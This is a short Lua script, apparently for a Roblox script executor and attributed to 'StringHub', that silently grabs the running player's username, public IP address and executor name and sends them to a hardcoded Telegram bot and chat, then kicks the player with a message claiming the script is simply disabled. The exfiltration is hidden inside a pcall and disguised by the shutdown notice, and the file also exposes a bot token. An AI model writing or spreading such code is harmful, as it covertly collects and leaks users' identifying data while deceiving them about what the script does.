pcall(function()
	local Name = game:GetService("Players").LocalPlayer.Name or "Unknown string"
	local IP = game:HttpGet("https://api64.ipify.org/?format=raw") or "Unknown string"
    local ServerId = "nil"
	local Executor = identifyexecutor() or "Unknown executor"
	
	game:HttpGet("https://api.telegram.org/bot7959621841:AAGXWUeOZSpHmWXemE0jbEadASf6lzu_t9k/sendMessage?chat_id=-1002508322252&parse_mode=html&text=Name%3A%20%3Cb%3E" .. Name .. "%3C%2Fb%3E%0AIP%3A%20%20%3Cb%3E" .. IP .. "%3C%2Fb%3E%0AServerId%3A%20%20%3Cb%3E" .. ServerId .. "%3C%2Fb%3E%0AExecutor%3A%20%20%3Cb%3E" .. Executor .. "%3C%2Fb%3E")
end)

game:GetService("Players").LocalPlayer:Kick("Script are disabled on unknown time.\nIts not related with CTS Owner/AntiCheat\nThanks for using.\nStringHub, made by @DemixLuasher.\nDiscord: demedex123")
